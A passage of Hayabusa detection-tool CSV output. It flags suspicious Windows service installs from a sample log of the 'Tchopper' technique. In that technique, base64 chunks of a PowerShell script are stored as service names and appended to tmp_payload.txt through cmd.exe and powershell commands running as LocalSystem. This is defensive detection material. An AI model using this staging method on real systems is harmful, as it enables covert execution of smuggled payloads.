start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:55.761 
+09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RlbS5XaW5kb3dzLkZvcm1zLkZvcm0NCg0KICAgICAgICAkRm9ybS53aWR0aCA9IDMwMA0KICAgICAgICAkRm9ybS5oZWlnaHQgPSAxNTANCiAgICAgICAgJEZvcm0uVGV4dCA9IOKAnVNlbGVjdCAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:55.761 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RlbS5XaW5kb3dzLkZvcm1zLkZvcm0NCg0KICAgICAgICAkRm9ybS53aWR0aCA9IDMwMA0KICAgICAgICAkRm9ybS5oZWlnaHQgPSAxNTANCiAgICAgICAgJEZvcm0uVGV4dCA9IOKAnVNlbGVjdCAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:57.214 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: VGl0bGXigJ0NCg0KICAgICAgICAkRHJvcERvd24gPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkNvbWJvQm94DQogICAgICAgICREcm9wRG93bi5Mb2NhdGlvbiA9IG5ldy1vYmplY3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:19:57.214 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VGl0bGXigJ0NCg0KICAgICAgICAkRHJvcERvd24gPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkNvbWJvQm94DQogICAgICAgICREcm9wRG93bi5Mb2NhdGlvbiA9IG5ldy1vYmplY3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:57.214 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VGl0bGXigJ0NCg0KICAgICAgICAkRHJvcERvd24gPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkNvbWJvQm94DQogICAgICAgICREcm9wRG93bi5Mb2NhdGlvbiA9IG5ldy1vYmplY3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:58.655 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMTApDQogICAgICAgICREcm9wRG93bi5TaXplID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEzMCwzMCkNCg0KICAgICAgICBGb3JFYWNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:58.655 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMTApDQogICAgICAgICREcm9wRG93bi5TaXplID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEzMCwzMCkNCg0KICAgICAgICBGb3JFYWNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:58.655 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMTApDQogICAgICAgICREcm9wRG93bi5TaXplID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEzMCwzMCkNCg0KICAgICAgICBGb3JFYWNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:00.108 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICgkSXRlbSBpbiAkRHJvcERvd25PcHRpb25zKSB7DQogICAgICAgICBbdm9pZF0gJERyb3BEb3duLkl0ZW1zLkFkZCgkSXRlbSkNCiAgICAgICAgfQ0KDQogICAgICAgICRGb3JtLkNvbnRyb2xzLk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:00.108 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICgkSXRlbSBpbiAkRHJvcERvd25PcHRpb25zKSB7DQogICAgICAgICBbdm9pZF0gJERyb3BEb3duLkl0ZW1zLkFkZCgkSXRlbSkNCiAgICAgICAgfQ0KDQogICAgICAgICRGb3JtLkNvbnRyb2xzLk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:00.108 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICgkSXRlbSBpbiAkRHJvcERvd25PcHRpb25zKSB7DQogICAgICAgICBbdm9pZF0gJERyb3BEb3duLkl0ZW1zLkFkZCgkSXRlbSkNCiAgICAgICAgfQ0KDQogICAgICAgICRGb3JtLkNvbnRyb2xzLk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:01.550 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: FkZCgkRHJvcERvd24pDQoNCiAgICAgICAgJERyb3BEb3duTGFiZWwgPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkxhYmVsDQogICAgICAgICREcm9wRG93bkxhYmVsLkxvY2F0aW9u | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:01.550 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FkZCgkRHJvcERvd24pDQoNCiAgICAgICAgJERyb3BEb3duTGFiZWwgPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkxhYmVsDQogICAgICAgICREcm9wRG93bkxhYmVsLkxvY2F0aW9u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:01.550 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FkZCgkRHJvcERvd24pDQoNCiAgICAgICAgJERyb3BEb3duTGFiZWwgPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkxhYmVsDQogICAgICAgICREcm9wRG93bkxhYmVsLkxvY2F0aW9u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:03.020 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 
ID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEwLDEwKSANCiAgICAgICAgJERyb3BEb3duTGFiZWwuc2l6ZSA9IG5ldy1vYmplY3QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMjApIA | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:03.020 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEwLDEwKSANCiAgICAgICAgJERyb3BEb3duTGFiZWwuc2l6ZSA9IG5ldy1vYmplY3QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMjApIA | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:03.020 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEwLDEwKSANCiAgICAgICAgJERyb3BEb3duTGFiZWwuc2l6ZSA9IG5ldy1vYmplY3QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMjApIA | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:04.472 
+09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 0KICAgICAgICAkRHJvcERvd25MYWJlbC5UZXh0ID0gIk9wdGlvbnM6Ig0KICAgICAgICAkRm9ybS5Db250cm9scy5BZGQoJERyb3BEb3duTGFiZWwpDQoNCiAgICAgICAgJEJ1dHRvbiA9IG5ldy1v | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:04.472 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KICAgICAgICAkRHJvcERvd25MYWJlbC5UZXh0ID0gIk9wdGlvbnM6Ig0KICAgICAgICAkRm9ybS5Db250cm9scy5BZGQoJERyb3BEb3duTGFiZWwpDQoNCiAgICAgICAgJEJ1dHRvbiA9IG5ldy1v | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:04.472 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KICAgICAgICAkRHJvcERvd25MYWJlbC5UZXh0ID0gIk9wdGlvbnM6Ig0KICAgICAgICAkRm9ybS5Db250cm9scy5BZGQoJERyb3BEb3duTGFiZWwpDQoNCiAgICAgICAgJEJ1dHRvbiA9IG5ldy1v | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:20:05.916 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: YmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuQnV0dG9uDQogICAgICAgICRCdXR0b24uTG9jYXRpb24gPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDUwKQ0KICAgICAgICAkQn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:05.916 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuQnV0dG9uDQogICAgICAgICRCdXR0b24uTG9jYXRpb24gPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDUwKQ0KICAgICAgICAkQn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:05.916 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuQnV0dG9uDQogICAgICAgICRCdXR0b24uTG9jYXRpb24gPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDUwKQ0KICAgICAgICAkQn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:07.360 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: V0dG9uLlNpemUgPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDIwKQ0KICAgICAgICAkQnV0dG9uLlRleHQgPSAiU3VibWl0Ig0KICAgICAgICAkQnV0dG9uLkFkZF9DbGljayh7 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:07.360 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: V0dG9uLlNpemUgPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDIwKQ0KICAgICAgICAkQnV0dG9uLlRleHQgPSAiU3VibWl0Ig0KICAgICAgICAkQnV0dG9uLkFkZF9DbGljayh7 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:07.360 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: V0dG9uLlNpemUgPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDIwKQ0KICAgICAgICAkQnV0dG9uLlRleHQgPSAiU3VibWl0Ig0KICAgICAgICAkQnV0dG9uLkFkZF9DbGljayh7 | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:08.810 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: UmV0dXJuLURyb3BEb3dufSkNCiAgICAgICAgJGZvcm0uQ29udHJvbHMuQWRkKCRCdXR0b24pDQoNCiAgICAgICAgJERyb3BEb3duLlNlbGVjdGVkSW5kZXggPSAgMA0KICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:08.810 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: UmV0dXJuLURyb3BEb3dufSkNCiAgICAgICAgJGZvcm0uQ29udHJvbHMuQWRkKCRCdXR0b24pDQoNCiAgICAgICAgJERyb3BEb3duLlNlbGVjdGVkSW5kZXggPSAgMA0KICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:08.810 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 
UmV0dXJuLURyb3BEb3dufSkNCiAgICAgICAgJGZvcm0uQ29udHJvbHMuQWRkKCRCdXR0b24pDQoNCiAgICAgICAgJERyb3BEb3duLlNlbGVjdGVkSW5kZXggPSAgMA0KICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:10.268 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgJEZvcm0uQWRkX1Nob3duKHskRm9ybS5BY3RpdmF0ZSgpfSkNCiAgICAgICAgW3ZvaWRdICRGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgICRDaG9pY2UNCiAgICAgfQ0KICAgICANCiAgICBj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:10.268 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgJEZvcm0uQWRkX1Nob3duKHskRm9ybS5BY3RpdmF0ZSgpfSkNCiAgICAgICAgW3ZvaWRdICRGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgICRDaG9pY2UNCiAgICAgfQ0KICAgICANCiAgICBj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:10.268 
+09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgJEZvcm0uQWRkX1Nob3duKHskRm9ybS5BY3RpdmF0ZSgpfSkNCiAgICAgICAgW3ZvaWRdICRGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgICRDaG9pY2UNCiAgICAgfQ0KICAgICANCiAgICBj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:11.713 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: YXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBnZW5lcmF0ZSBpbnB1dCBkcm9wIGRvd24iDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJEVycm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:11.713 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBnZW5lcmF0ZSBpbnB1dCBkcm9wIGRvd24iDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJEVycm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:20:11.713 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBnZW5lcmF0ZSBpbnB1dCBkcm9wIGRvd24iDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJEVycm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:13.158 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIkNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:13.158 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIkNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
